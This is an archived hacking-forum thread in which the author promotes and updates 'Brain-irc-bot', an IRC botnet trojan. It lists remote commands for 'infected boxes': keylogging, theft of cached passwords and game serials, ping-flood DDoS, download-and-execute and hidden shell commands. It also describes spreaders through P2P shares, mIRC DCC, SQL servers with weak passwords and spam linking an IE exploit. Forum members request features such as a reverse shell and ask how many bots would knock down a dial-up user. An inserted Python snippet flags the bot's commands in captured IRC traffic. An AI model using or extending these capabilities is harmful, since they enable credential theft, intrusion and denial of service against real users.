
Full Version: Brain-irc-bot _ Beta
brainbuster
Hi ,

I coded an IRC bot with several features.

===========
Changes in update to 1.5.3::

-added !uptime
-added !flood (floods ports http requests)
-added !socks on/off (starts a socks 4 on 1080) (by alch -> THX)

-fixed some bugs in connection procedure
===========

===========
I'm not responsible for anything you do with this.
It's not meant and coded for using it in real life practice.
IT'S YOUR FAULT, if u use this for any illegal purpose
===========


===========
Changes in update to 1.5::


-p2p Spreader added
-Mirc.ini manipulator-spreader
-IRC spam spreader
-bind file to server function(By flowby -> THX)
-Change Icon function(THX to flowby)

p2p Spreader:
spreads by copying itself to the shared folders of following p2p programs:
kazaa,klite,LimeWire,bearshare,Morpheus,Grokster

Mirc.ini manipulator-spreader:
Manipulates mirc installation in a way so it will send a msg and afterwards the bots
executable to all users in all channels the victim joins.(sends exe via dcc)

IRC spam spreader:
You can choose 5 irc networks and 20 different channels on these nets in builder.
the bots will join in there and spam around your message. You may put a fakesite-URL into the msg
or just let it post a link to your ie sploit...

bind file to server function:
Lets u bind any file to the server...
btw: makes it undetected =)

Change Icon function:
You can choose an Icon for the bot executable.
===========



Here is a List of all the commands to use with BrainBot beta 1.4::
=======================
=======================
!login <PW>
The Bot only will accept Commands after u logged in with this command...
So your bots won't be taken by some thieves =).
<Pw> stands for the admin - Password you specified in the server builder- form


!logout
This will log u out so that the bot doesn't accept commands anymore until u login again


!reboot
forces the infected machine to reboot =D


!shutdown
forces the infected machine to shutdown -.-^^


!info
This will show you some General Information about the infected box=)


!leave
makes the bot leave the channel ^^


!uninstall
uninstall the bot from infected box


!serials
The bot will post some game serials if installed...
gonna add support for some more games in next version.


!floodping <IP/Host>
The bot or bots will flood the specified Host with fast permanent pings!
(such as DDoS... depends on how many bots u got =D)


!logkeyson
turns keylogger on


!logkeysoff
turns keylogger off


!showkeys
shows all the logged keys


!clearlog
will clear the keylog file


!PWS
I think this is the best feature in this bot:
the bot will post cached IE passes and Outlook express passes


!dloadfile <url> <target>
will download a file from <URL> to <target>


!execfile <location>
Executes the file in <location>


!commands
shows a list of the commands =)

!IP
shows you the current ip of infected box


!nick <Nick>
bot changes its nick to <Nick>


!free
will show free disk space of infected machine


!spam <channel>
will start spamming the specified channel


!stopspam
stops spamming

========
!scan <Parameters>
scans with the Dfind-0.8 by class101
infos at: http://www.governmentsecurity.org/forum/index.php?showtopic=9120

use following parameters:
Usage: !scan <Option> [THREADS]

<Option>:
-p <Port> <IP IP> .......... Scan one port on iprange
+p <Port> <IP IP> .......... Scan iprange,+logs ok,refused connections
-p <Port , Port> <IP IP> ... Scan two ports on iprange
-p <Port Port> <IP> ........ Scan a portrange on ip
+p <Port Port> <IP> ........ Scan portrange,+logs ok,refused connections
-ban <Port Port> <IP> ........ Scan portbanners on ip
-ban <Port> <IP IP> .......... Scan portbanners on iprange
-cgi <IP> .................... Scan cgi hole
+ipc <IP IP> ................. Scan IPC$ null on 139 & 445
-ipc <IP IP> ................. Scan IPC$ null on 139
-ipc2 <IP IP> ................. Scan IPC$ null on 445
-iis <IP IP> ................. Scan IIS webservers
-apa <IP IP> ................. Scan Apache webservers
-wdv <IP IP> ................. Scan WebDav on IIS5.0
-hpj <IP IP> ................. Scan HP Web JetAdmin
-msa <IP IP> ................. Scan MSADC on webservers
-ccb <IP IP> ................. Scan CCBill WhereAmi
-med <IP IP> ................. Scan WMedia on webservers
-php <IP IP> ................. Scan phpBB on webservers
-php2 <IP IP> ................. Scan PHP-Nuke on webservers
-pso <IP IP> ................. Scan PSOProxy Server
-fro <IP IP> ................. Scan frontpage host
-rea <IP IP> ................. Scan RealServer component
-htr <IP IP> ................. Scan +.htr hole
-pri <IP IP> ................. Scan .printer host
-uni <IP IP> ................. Scan unicode hole
-idq <IP IP> ................. Scan .idq host
-cod <IP IP> ................. Scan codered virus hole
-opx <IP IP> ................. Scan OptixPRO v1.0 => 1.32(include) hole
-rad <IP IP> ................. Scan Radmin 2.1 Auth,NTAuth,NULL session
-sql <IP IP> ................. Scan MS SQL Servers for weak access
-req <REQ IP IP> ............. Scan File/Dir Request on webservers

!showscan
gives you the scan results

!sendscan <Your IP> <NC Port>
The bot will connect to <Your IP> <NC Port> and echo the dfind results to it
You have to start nc with this parameters before:
nc -l -p <port> >>dfind =D

!killscan
stops the current scanning process.
so u can clear the scanlogs by typing !shell del dfind
==========

!cat <file>
echos any file from infected box


!raw <IRCcommand>
will execute <IRCcommand>


!shell <commands>
will execute <commands> hidden on infected host
<commands> can be any dos command + parameters

!upgrade <upgradeURL>
<upgradeURL> is the URL of the new brainbot server.
it will be downloaded and executed while the old infection is removed.
this way u can easy upgrade to another brainbot version or start using another rat/bot


!op <channel> <nick>
gives <nick> +o in <channel>
of course only if bot has op in that channel.

!deop <channel> <nick>
gives <nick> -o in <channel> (deop's him =D)
of course only if bot has op in that channel.

!msg <Nick/chan> <message>
Sends <message> to the chosen nick or chan =)


=======================
=======================


===========
Changes in update to 1.4::

-An sql spreader is included now
-personalmessage-mode is now optional

comments to sql spreader:
U have to specify a FTP server in the editor and the name of the brainbot server.
this server executable will be spread by all ur bots to other sql weak pw servers.
U can specify a network. in this network (for example 217) the bot will scan random ranges for sql weak pws.
===========

===========
I had many requests for how to use the bot with passworded channel:

here is a howto:

before executing the bot u have to create the channel and set the password.
for example u set channel #foo with pw: bar .

Now u only have to type "foo bar" to the nick textbox and it will join #foo with pw bar.
===========


Would be nice if u guys test it and give me some feedback =)
and remember it's a beta(!)

get it here : www.brainbuster.tk

PS: would be nice if an admin could move this to trojan & virus errata forum
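
Added example, not part of the original post and not the bot's code: a defender-side pass over captured IRC traffic that flags channels carrying the command vocabulary listed above and the reply banners visible in the logs pasted later in this thread. The sample lines, nicks, hosts and score weights are constructed for illustration; addresses come from documentation ranges.

```python
import re
from collections import defaultdict

# Command names copied from the command list in the post above (lowercased).
HIGH_SIGNAL = {
    "floodping", "flood", "logkeyson", "logkeysoff", "showkeys", "clearlog",
    "pws", "serials", "dloadfile", "execfile", "shell", "upgrade", "uninstall",
    "scan", "showscan", "sendscan", "killscan", "socks", "spam", "stopspam",
}
# Names ordinary channel bots also use; counted only after a !login by that nick.
LOW_SIGNAL = {
    "logout", "reboot", "shutdown", "info", "leave", "commands", "ip",
    "nick", "free", "cat", "raw", "op", "deop", "msg", "uptime",
}
# Reply strings seen in the logs pasted in this thread (the typo is the bot's).
BANNERS = ("You're now logged in as my admin and master!", "/General Infomation\\")

PRIVMSG = re.compile(r"^:(?P<nick>[^!\s]+)!\S+ PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
COMMAND = re.compile(r"^!(?P<name>[A-Za-z0-9]+)\b")


def analyze(lines):
    """Return {target: finding} for PRIVMSG targets that look like bot control."""
    state = defaultdict(lambda: {"operators": set(), "commands": [], "banners": 0})
    for raw in lines:
        m = PRIVMSG.match(raw.rstrip("\r\n"))
        if not m:
            continue  # PING, JOIN, numerics and so on
        chan = state[m["target"].lower()]
        text = m["text"]
        if any(b in text for b in BANNERS):
            chan["banners"] += 1
        c = COMMAND.match(text)
        if not c:
            continue
        name = c["name"].lower()
        if name == "login":
            chan["operators"].add(m["nick"])  # the password argument is never stored
        elif name in HIGH_SIGNAL or (name in LOW_SIGNAL and m["nick"] in chan["operators"]):
            chan["commands"].append((m["nick"], name))
    findings = {}
    for target, chan in state.items():
        high = [n for _, n in chan["commands"] if n in HIGH_SIGNAL]
        authed = [n for nick, n in chan["commands"] if nick in chan["operators"]]
        # Alert on a bot banner, or on a !login combined with a high-signal command.
        if chan["banners"] or (chan["operators"] and high):
            findings[target] = {
                "score": 3 * len(high) + len(authed) + 5 * chan["banners"],
                "operators": sorted(chan["operators"]),
                "commands": [n for _, n in chan["commands"]],
            }
    return findings


# Constructed capture: one control channel and one benign help channel.
SAMPLE = [
    ":op1!u@host.example.net PRIVMSG #botchan :!login REDACTED",
    ":BOT-01!~b@198.51.100.7 PRIVMSG #botchan :You're now logged in as my admin and master!",
    ":op1!u@host.example.net PRIVMSG #botchan :!info",
    ":BOT-01!~b@198.51.100.7 PRIVMSG #botchan :(_____/General Infomation\\_____)",
    ":op1!u@host.example.net PRIVMSG #botchan :!floodping 192.0.2.10",
    ":alice!a@users.example.org PRIVMSG #help :!info",
    ":helper!h@services.example.org PRIVMSG #help :Use !commands to list topics",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    for target, finding in analyze(SAMPLE).items():
        print(target, finding)
```

Because `!login <PW>` crosses the wire in cleartext, a capture like this also contains the operator password; the detector records only who logged in, not the argument.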
mrBob
very nice one m8!
i like the password thingie
gonna test it locally

thanx
brainbuster
there should spawn an ircbot.exe in the folder of server-builder.exe

oh lol i'm sorry ... there was a bug... i fixed it..

Subx
Great shit pal,i like this one!
brainbuster
automated spreadin and stuff may come up in next version
illwill
no worky on winxp pro sp1
JaSeR
In my WinXP SP1 Pro (Spanish) working but it has got a bug, when i type !info the bot crashes of irc because of flood:

QUOTE

(08:24:40) (DJASER-15) (_______________________/General Infomation\______________________)
(08:24:41) (DJASER-15) (_________________________________________________________________)
(08:24:41) (DJASER-15) Operating System: Microsoft Windows XP
(08:24:41) (DJASER-15) Computer Name: xxxxx
(08:24:41) (DJASER-15) Windows User Name: xxxxxx
(08:24:41)    -> quit: (DJASER-15) (~botje@xxxxxxxxxxx) (Excess Flood)
brainbuster
oh.. that depends on the server and how many messages it allows in a row...
just choose a server without that hard rules for testing it....

on 69.28.183.219 6667 the bots never get kicked due to flood... may go there 4 trying out the features

and ill ... what kinda error do ya get?

I'll add a function in next version to avoid flood kicks!
agathos
brainbuster just code in that the bot sends only 513 bytes and then the next 513 bytes so the result is no Excess Flood
brainbuster
Updated it again and nothing gets kicked anymore
hf!
ducky
works good,good job m8
ps-maybe next version you can make !nick command,so the nick of the bot can be changed...
dont-staY
great works! Can you add an !ip command which gives me the actual ip-address of the bot?
brainbuster
added those 2 commands
ducky
now the builder doesn't work for some reason...gives me error :|

can u check that plz?

greetz
brainbuster
What kinda error do you get.. works fine for me...
ducky
error like this :

windows error :

Brainbot - server builder

system error &H8007007E (-2147024770)

weird thing...
dont-staY
on my local machine it works perfect!
Can you add !free for listing the free space of all drives? Also an !uptime command for the server uptime would be good.
Macsou
Where can I get the next version ?
brainbuster
i updated the old link with the changes i made until now
brainbuster
added following commands

QUOTE

[edit]
!IP
shows you the current ip of infected box

!nick <Nick>
bot changes its nick to <Nick>


!free
will show free disk space of infected machine


!spam <channel>
will start spamming the specified channel


!stopspam
stops spamming
[/edit]
Merchantp
no source? =(
sevenvirtues
there seems to be errors..if you extract it inside a directory..you have to extract it in the main...example:

extract it in c:\> it will work..

but if you place it inside a dir in c: it wont..


and also, what servers do you use..

tried it on undernet, it didnt came up..

thank you
brainbuster
i tried it with a few servers... it always worked
but maybe the server doesn't allow 2 different logins by the same IP..
just try it on a vic or somethin.... cuz it should work with every server.
sevenvirtues
i have mcafee firewall and AV...of course it detected the bot..so i disabled the AV and FW..i also closed the entire mcafee security center..

i ran the bot..i see it in netstat connection to the server..

two ports connected on 6667..one is mine (different server but the same network (undernet)) and the other i 'assume' belongs to the bot (another server but the same network (undernet))

both connections have 'established' under the state column so i presumed the bot is connected since i am connected too..

but the problem is..the bot isn't in the channel where i want it to be..

i'm sure undernet allows clones..tried it ..(i opened another client w/ different nick it got connected)

any idea what went wrong?

tnx
brainbuster
now i tried on quebec.qu.ca.undernet.org port 6667
it worked nice

did u type the channel with a # in the editor?
u have to type only the channel without #

#edit
at my second try it didn't join at first... i reconnected in mirc and then it was there
#/edit
sevenvirtues
hehehehhehe..sometimes i amazed myself..i forgot that one..
man this is so embarrassing..sorry about that one dude..its 5:27AM here and i was online the whole night..my brain must be in overheat...heheheheh...

thanks..

hehehehehehe..

sevenvirtues
ok its up..

!floodping <IP/Host>
The bot or bots will flood the specified Host with fast permanent pings!
(such as DDoS... depends on how many bots u got =D)

approx. how many bots does it need to knock down a 56k dial up?
brainbuster
hadn't chance to test it....
i guess 4-10 bots 4 a 64k....
i just know it really pings as hell^^
ANTITRUST
CODE

06[02ANTITRUST06]13 !login xxxxxxxxxxxxxxxx
06[xxxxxxxxxxxxxxxxx]13 You're now logged in as my admin and master!
06[02ANTITRUST06]13 !info
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 (_______________________/General Infomation\______________________)
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 (_________________________________________________________________)
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Operating System: xxxxxxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Computer Name: xxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Windows User Name: xxxxxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Time zone: xxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Resolution: xxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 System Directory: C:\
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Windows Directory: C:\xxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Kazaa Shared Folder: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 System Model: xxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Systm Manufacturer: xxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Boot Device: \Device\xxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Video Card: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Processor Name: xxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Processor ID: xxxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Processor Vendor: xxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Processor Speed(XP/2k Only):xxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Bios Identifier: xxxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Bios Date: xx/xx/xx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Video Bios Date: xx/xx/xx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 IE Start Page: http://www.XXX.com/
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 IE Search Page: http://www.XXX.com/
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 IE Caption: xxxxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 MSN Messenger Server: xxxxxxxxxxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 MSN Messenger Email: xxxxxxxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Yahoo ID: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Aim Screen Name: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Kazaa Email: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 (_________________________________________________________________)
06[02ANTITRUST06]13 !serials
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 (_____/Game Cd Keys\_____)
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 (________________________)
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 =================  
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Windows Serial: xxxxxxx-xxxxxxxx-xxxxxxx-xxxxxxx
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 =================  
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Half-Life CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 C&C Generals CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 C&C Generals CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Gunman Chronicles CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 IGI 2 - Covert Strike CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Industry Giant 2 CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 James Bond 007 - Nightfire CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Medal Of Honor: Allied Assault CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Medal Of Honor: Allied Assault - Spearhead CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Need For Speed: Hot Pursuit 2 CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Shogun: Total War - Warlord Edition CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Soldiers Of Anarchy CD Key: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 Unreal Tournament 2003: ------
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 (________________________)
06[02ANTITRUST06]13 !commands
06[xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]13 !shutdown, !serials, !info, !leave, !nick <Nick>, !login <PW>, !logout, !reboot, !IP, !uninstall, !about, !floodping <IP/Host>, !logkeyson,  !logkeysoff, !clearlog, !PWS, !showkeys, !dloadfile <url> <location>, !execfile <location>, !STOPSPAM, !SPAM <Channel>, !free


Does y have T-it it possibility of installing it in remote on a server?
brainbuster
QUOTE
Does y have T-it it possibility of installing it in remote on a server?


i don't understand your question... you mean installing it through a remote shell??
ANTITRUST
Is what there is another version to install this club-footed on a stro, because this one is usable for a room.
globey
that's like a nice irc-bot

tnx for the bot but if u can add scanning option it will be great (hacking is better but scanning is nice 2)

globey.
DJVandal
Very Nice Bot! I cant wait till an auto spread feature is added also any chance on seeing the source?
NiteWorM
Nice Bot mate but can you add the command !raw <command> which would allow the user to do raw irc commands like JOIN PART PRIVMSG. that function in the bot would be greatly appreciated other than that keep up the good work bot master ;P
brainbuster
nice that u guys like it
I will see whether i find time workin on it...but i think i will..
simply-me
Great bot !!!

It would be even gr8r if you add a !shell command which would execute dos commands ie shell anything in hidden mode with arguments.

a !cat command which would display contents of ASCII files.

a !connect command which would open a connection to the host n port specified and provide a reverse shell. This would give faster connection n we can also use it if the vic is on a LAN.

and if u include a auto spread function in the next ver please make it optional in the server.
brainbuster
QUOTE
!scan <Port> <IPfrom> <IPto>
scans a range on a port of your choice


!showscan
gives you the scan results


!cat <file>
echos any file from infected box


here's a new update... i hadn't that much time so there're maybe some bugs...
I'll try to add an back connect function tomorrow..

new update

have a nice day guys
Metathron
can you add a function 4 a password protected channel ?
ESKiM0J03
thx for the update wont let me start the server builder now
sevenvirtues
aside from the irc rax commands,can you add a simple irc flood command..let say..msg flood or dcc..something like that..when bots talk/advertises/floods at the same time on a nick or channel..bwaheheheheheh..

tnx
slynx
eeewwww..... visual basic...... ;(

can you port this to c/c++ ? or at least, post the irc protocol function sources to
the forum? also, why is this detected by A.V.? is it not new code? (e.g. you ripped
the code from somewhere.....)

also, i'd like to try it out, but #1 rule: don't execute closed-source blackhat trojans
unless you're doing it in a virtual machine (and mine died last week...)

i'd love to see source for this one, thanx for posting ;)
SickO
QUOTE (NiteWorM @ Jul 3 2004, 01:51 AM)
Nice Bot mate but can you add the command !raw <command> which would allow the user to do raw irc commands like JOIN PART PRIVMSG. that function in the bot would be greatly appreciated other than that keep up the good work bot master ;P

yea the !raw command would be very nice and proxy scanner in it,sounds maybe stupid, but if you are using bot on some random guy then you really dont care what happens to him, you get proxys:P
kenshin_efx
yeaahh this very nice, i wanna check the source for try understand some thing

sound great !!
Skyliner
Great Bot! Thx very much!!
brainbuster
QUOTE
can you port this to c/c++ ? or at least, post the irc protocol function sources to
the forum? also, why is this detected by A.V.? is it not new code? (e.g. you ripped
the code from somewhere.....)

it wasn't detected before i posted it here at govsec
jhd
QUOTE (JaSeR @ Jul 2 2004, 06:29 AM)
In my WinXP SP1 Pro (Spanish) working but it has got a bug, when i type !info the bot crashes of irc because of flood:

QUOTE

(08:24:40) (DJASER-15) (_______________________/General Infomation\______________________)
(08:24:41) (DJASER-15) (_________________________________________________________________)
(08:24:41) (DJASER-15) Operating System: Microsoft Windows XP
(08:24:41) (DJASER-15) Computer Name: xxxxx
(08:24:41) (DJASER-15) Windows User Name: xxxxxx
(08:24:41)    -> quit: (DJASER-15) (~botje@xxxxxxxxxxx) (Excess Flood)

use timer in CODE
NiteWorM
the bot isn't detected by vet update version 8425, but i will ask this question again thou before u make another update on the bot add the !raw command, believe me it will give the bot its weight in gold. a lot of good trojans created end up being crappy because of less irc functionality. i hope to see it in the next version if not i guess i'll post here again
brainbuster
QUOTE

!raw <IRCcommand>
will execute <IRCcommand>


isn't a big update

update



QUOTE
QUOTE (JaSeR @ Jul 2 2004, 06:29 AM)
In my WinXP SP1 Pro (Spanish) working but it has got a bug, when i type !info the bot crashes of irc because of flood:


QUOTE 

(08:24:40) (DJASER-15) (_______________________/General Infomation\______________________)
(08:24:41) (DJASER-15) (_________________________________________________________________)
(08:24:41) (DJASER-15) Operating System: Microsoft Windows XP
(08:24:41) (DJASER-15) Computer Name: xxxxx
(08:24:41) (DJASER-15) Windows User Name: xxxxxx
(08:24:41)    -> quit: (DJASER-15) (~botje@xxxxxxxxxxx) (Excess Flood)




use timer in CODE


that problem is fixed since a few days =)
PiP
QUOTE (brainbuster @ Jul 4 2004, 11:08 AM)
QUOTE
can you port this to c/c++ ? or at least, post the irc protocol function sources to
the forum? also, why is this detected by A.V.? is it not new code? (e.g. you ripped
the code from somewhere.....)

it wasn't detected before i posted it here at govsec


I know for sure there are at least members here from KAV, so i wouldn't find it surprising if other AV companies have employees that are members here as well
slynx
QUOTE
I know for sure there are at least members here from KAV, so i wouldn't find it surprising if other AV companies have employees that are members here as well


ooo i'd love to find out who's who.... ;)